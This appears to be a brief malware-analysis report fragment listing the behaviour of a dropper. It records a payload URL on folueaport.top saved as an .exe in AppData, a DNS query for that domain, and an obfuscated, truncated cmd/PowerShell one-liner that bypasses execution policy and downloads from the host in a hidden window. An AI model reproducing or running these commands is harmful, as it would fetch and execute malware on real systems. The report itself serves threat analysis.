Technical Information
- http://folueaport.top/read.php?f=0.dat as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^OWERsHeLl.^EX^e ^-EX^E^C^UTiO^N^po^L^icY b^Y^PasS -n^Op^r^o^FiLe ^-w^indO^w^St^Y^L^E ^h^I^DDen^ (N^e^w-OBJEC^T sY^S^Te^m^.nET.^wE^BC^L^ienT).DO^wn^LoAdfiLE('http://folueaport.t...
- DNS ASK fo###aport.top
- '<SYSTEM32>\cmd.exe' /c "P^OWERsHeLl.^EX^e ^-EX^E^C^UTiO^N^po^L^icY b^Y^PasS -n^Op^r^o^FiLe ^-w^indO^w^St^Y^L^E ^h^I^DDen^ (N^e^w-OBJEC^T sY^S^Te^m^.nET.^wE^BC^L^ienT).DO^wn^LoAdfiLE('http://folueaport.t...' (with hidden window)